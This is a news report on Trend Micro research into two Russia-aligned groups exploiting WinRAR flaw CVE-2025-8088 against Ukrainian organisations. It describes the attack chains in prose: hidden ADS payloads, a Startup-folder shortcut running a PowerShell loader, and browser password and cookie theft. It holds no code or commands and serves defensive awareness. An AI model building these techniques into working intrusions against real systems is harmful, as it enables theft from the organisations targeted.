Russia-aligned groups exploit WinRAR flaw in Ukraine

Trend Micro researchers reported that two Russia-aligned cyber groups continued exploiting a patched WinRAR path‑traversal vulnerability to target Ukrainian organisations nearly a year after the vendor released fixes.

The flaw, tracked as CVE‑2025‑8088 and patched in July 2025, allows files to be written outside the intended extraction folder by using NTFS Alternate Data Streams (ADS). Attackers hide payloads in ADS so they are not visible in normal file listings and can evade standard extraction controls.

One cluster, tracked as SHADOW‑EARTH‑066 (also referenced as UAC‑0226), shifted from Excel macro droppers to crafted RAR archives. The archives include a visible decoy PDF and multiple hidden ADS payloads located outside the extraction directory. A Windows Shortcut file placed in the Startup folder runs at login and launches cmd.exe to spawn a PowerShell loader. The loader uses in‑memory DLL loading to run an updated GIFTEDCROOK binary named “result.dll.” The malware extracts passwords and cookies from Chromium‑based browsers and Firefox, and copies documents with targeted extensions. After sending data to remote servers, operators remove the malicious files to limit forensic traces.

Trend Micro analysts observed that the SHADOW‑EARTH‑066 operators moved from using Telegram for data extraction to dedicated command‑and‑control servers, a change that corresponds with a nationwide Telegram block implemented earlier in February.

The second actor, Earth Dahu (also known as Gamaredon), incorporated CVE‑2025‑8088 into campaigns aimed at long‑term access. Its chain begins with a GammaPhish HTML Application (HTA) that retrieves a VBScript downloader called GammaLoad. GammaLoad delivers modules such as GammaSteel, an information stealer that can monitor file changes in real time. Internal RAR timestamps and file naming conventions indicate Earth Dahu’s chain was active through at least April 10, 2026.

Trend Micro researchers Hiroyuki Kakara and Feike Hacquebord wrote that the findings illustrate “how unmanaged software keeps an exploited entry point open long after the fix ships.” They added that WinRAR remains widely used across Ukrainian organisations, making unpatched instances attractive targets for exploitation.

Both campaigns relied on the same patched vulnerability and used ADS, LNK shortcuts and PowerShell to achieve persistence and payload execution. The activity highlights the continued use of a known vulnerability against organisations that have not fully updated or managed their software inventory.